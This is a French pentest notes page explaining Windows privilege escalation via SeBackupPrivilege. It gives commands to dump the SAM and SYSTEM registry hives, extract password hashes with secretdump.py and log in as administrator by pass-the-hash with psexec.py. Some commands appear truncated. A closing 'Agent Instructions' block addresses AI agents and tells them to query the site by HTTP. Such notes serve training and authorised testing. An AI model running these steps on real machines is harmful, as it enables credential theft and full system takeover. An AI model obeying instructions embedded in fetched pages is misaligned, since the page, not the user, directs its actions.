# SeBackupPrivilege Cette élévation de privilèges spécifique est basée sur le fait d'attribuer un SeBackupPrivilege à un utilisateur. Il a été conçu pour permettre aux utilisateurs de créer des copies de sauvegarde du système. Puisqu'il n'est pas possible de faire une sauvegarde de quelque chose que vous ne pouvez pas lire. Ce privilège se fait au prix de fournir à l'utilisateur un accès complet en lecture au système de fichiers. Ce privilège doit contourner toute ACL placée par l'administrateur sur le réseau. Donc, en un mot, ce privilège permet à l'utilisateur de lire n'importe quel fichier sur l'intégralité des fichiers qui pourraient également inclure des fichiers sensibles tels que le fichier SAM ou le fichier de registre SYSTEM. ## Détection Une fois connecté sur la machine, il faut vérifier si SeBackupPrivilege est actif dans les résultats de la commande *`whoami /priv`* ## Exploitation Comme nous l'avons vu précédemment, ce privilège permet à l'utilisateur de lire tous les fichiers du système, nous l'utiliserons à notre avantage. On va donc sauvegarder les fichiers SAM et SYSTEM dans un nouveau fichier: ``` # Création du dossier qui contiendra les fichiers de registre cd C:\ mkdir Temp # Sauvegarde des fichiers de registre reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system ``` On va ensuite télécharger les fichiers sur notre machine locale (avec la commande download sur evil-winrm par exemple) La prochaine étape est d'utiliser secretdump.py pour récolter les hash dont celui qui nous intéresse, celui de l'administrateur. *`$ python3 secretdump.py -system -sam local`* Il est alors possible d'ouvrir une session administrateur avec le hash de celui-ci: *`$ python3 psexec.py -hashes administrator@ cmd.exe`* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.s1rn3tz.ovh/post-exploitation/enumeration-elevation-de-privileges/windows/sebackupprivilege.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.